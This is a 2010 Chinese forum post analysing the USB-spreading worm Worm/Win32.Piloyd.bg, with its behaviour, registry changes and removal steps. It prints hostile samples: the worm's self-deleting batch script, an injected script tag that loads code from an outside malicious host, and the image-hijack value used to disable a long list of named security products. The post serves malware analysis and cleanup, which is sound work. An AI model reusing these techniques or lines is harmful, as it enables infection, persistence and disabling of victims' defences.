flyleaf 发表于 2010-5-25 13:55

Worm/Win32.Piloyd.bg[Net]分析

一、 病毒标签:
病毒名称: Worm/Win32.Piloyd.bg
病毒类型: 蠕虫
文件 MD5: 4A8CC6F40BBB9DBB03BFD7943790086E
公开范围: 完全公开
危害等级: 4
文件长度: 26,112 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: UPX

二、 病毒描述:
该病毒文件利用U盘传播自身,当用户通过USB口插上U盘时病毒会遍历本地所有磁盘类型,如果发现可移动磁盘则会将病毒文件拷贝到磁盘目录下,如果系统没有屏蔽掉自动播放功能将会直接运行病毒,病毒一旦运行之后则会对操作系统造成很大的破坏性。

三、 行为分析:
本地行为:
1、衍生病毒文件到以下目录:
%System32%\drivers\etc\hosts
%System32%\dllcache\lsasvc.dll
%System32%\qmgr.dll
2、Ghost.exe文件分析:
动态加载多个系统库DLL文件实现动态获取API函数,获取自身模块句柄判断当前启动器类型是否为2(可移动磁盘),如果是则调用"explorer.exe"进程,获取%System32%目录,打开服务管理器,打开注册表,查看netsvcs服务是否开启,如果开启则将关闭此服务,还原HOSTS文件为初始状态,查找%System32%目录的qmgr.dll文件,找到之后调用"sfc_os.dll"文件去掉对qmgr.dll文件的保护,创建qmgr.dll文件替换现有的文件,达到自启动目的,释放Loopt.bat批处理文件到%TEMP%临时目录下,调用函数执行批处理文件,批处理文件执行之后拷贝自身文件到%system32%\dllcache目录下命名为lsasvc.dll最后删除自身文件。

Loopt.bat文件代码内容为:
copy /Y "G:\Ghost.exe" "%System32%\dllcache\lsasvc.dll"
:runagain
del "G:\Ghost.exe"
if exist "G:\Ghost.exe" goto runagain
del "C:\DOCUME~1\a\LOCALS~1\Temp\Loopt.bat"

qmgr.dll文件分析:
线程1、获取自身模块,判断自身是否在360tray.exe进程中,如是则打开\\.\360SpShadow0驱动设备,向该设备发送关闭代码,结束360tray.exe进程,接着创建一个线程,动态加载NTDLL.DLL、urlmon.dll、Kernel32.dll、Ws2_32.dll获取大量API函数,循环遍历查找avp.exe、bdagent.exe、360tray.exe进程,找到之后强行结束其进程。

线程2、删除注册表安全模式,禁掉显示系统隐藏文件,试图打开\\.\NtHid驱动设备,尝试还原SSDT,添加注册表映像劫持、劫持多款安全软件,修改HOSTS文件内容为"127.0.0.* localhost",打开%system32%\dllcache目录下命名为lsasvc.dll,获取该病毒文件大小,将文件映射到内存

线程3、试图打开管道"\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A",并将如果打开失败则创建,利用该管道进程远程通讯。

线程4、获取本地磁盘类型判断是否是可移动磁盘,如果是则遍历磁盘目录下是否存在autorun.inf,如果不存在则创建autorun.inf文件和recycle.{645FF040-5081-101B-9F08-00AA002F954E}为名的目录,并将%system32%\dllcache目录下的lsasvc.dll拷贝到该磁盘目录下命名为Ghost.exe,然后删除%system32%\dllcache目录下的lsasvc.dll文件。

线程5、调用IEXPLORE.EXE进程后台打开http://nbtj.114a****.com/msn/163.htm?2,该网址已失败。

线程6、遍历所有磁盘下的htm、html、asp、aspx后缀名文件,找到之后再文件中插入恶意代码<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>,遍历rar后缀名的文件找到之后试图调用%s m -ibck -r -o+ -ep1 "%s" "%s\*"命令将病毒文件打包到压缩包中。

3、对注册表的修改:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\
描述:删除以上键下所有的子键值,该键下是系统安全模式相关驱动服务键值及后台智能传送服务

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\被劫持的文件名\Debugger
值: 字符串:"ntsd -dntsd -dntsd -dntsd -dntsd-dntsd -dntsd -dntsd -dntsd -dn"
KVMonXP.kxp.KVSrvXP.exe、avp.exe、avp.exe、avp.exe、RavMonD.exe、RavTask.exe、RsAgent.exe、rsnetsvr.exe、RsTray.exe、ScanFrm.exe、CCenter.exe、kavstart.exe、kissvc.exe、kpfw32.exe、kpfwsvc.exe、kswebshield.exe、kwatch.exe、kmailmon.exe、egui.exe、ekrn.exe、ccSvcHst.exe、ccSvcHst.exe、ccSvcHst.exe、Mcagent.exe、mcmscsvc.exe、McNASvc.exe、Mcods.exe、McProxy.exe、Mcshield.exe、mcsysmon.exe、mcvsshld.exe、MpfSrv.exe、McSACore.exe、msksrver.exe、sched.exe、avguard.exe、avmailc.exe、avwebgrd.exe、avgnt.exe、sched.exe、avguard.exe、avcenter.exe、UfSeAgnt.exe、TMBMSRV.exe、SfCtlCom.exe、TmProxy.exe、360Soft.exe、MgrSvc.exe、360tray.exe、qutmserv.exe、bdagent.exe、livesrv.exe、seccenter.exe、vsserv.exe、MPSVC.exe、MPSVC1.exe、MPSVC2.exe、MPMon.exe、ast.exe、360speedld.exe、360SoftMgr.Svc.exe、360tray.exe、修复工具.exe、360hotfix.exe、360rpt.exe、360safe.exe、360safebox.exe、krnl360svc.exe、zhudongfangyu.exe、360sd.exe、360rp.exe、360se.exe
描述:添加映像劫持、劫持多款安全软件

网络行为:
http://nbtj.114a****.com/msn/163.htm?2
描述:调用IEXPLORE.EXE进程后台打开以上链接地址,该地址已失效

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
      %Windir%            WINDODWS所在目录
    %DriveLetter%            逻辑驱动器根目录
    %ProgramFiles%         系统程序默认安装目录
    %HomeDrive%           当前启动的系统的所在分区
    %Documents and Settings%       当前用户文档根目录
    %Temp%             \Documents and Settings
                    \当前用户\Local Settings\Temp
    %System32%            系统的 System32文件夹
    
    Windows2000/NT中默认的安装路径是C:\Winnt\System32
    windows95/98/me中默认的安装路径是C:\Windows\System
    windowsXP中默认的安装路径是%System32%   


四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用ATOOL进程管理结束SVCHOST.EXE进程中的病毒qmgr.dll模块。
(2) 强行删除病毒下载的大量病毒文件
%System32%\drivers\etc\hosts
%System32%\dllcache\lsasvc.dll
%System32%\qmgr.dll
(3)恢复病毒删除的注册表项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\
删除注册表添加的映像劫持
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\被劫持的文件名\Debugger
页: [1]
查看完整版本: Worm/Win32.Piloyd.bg[Net]分析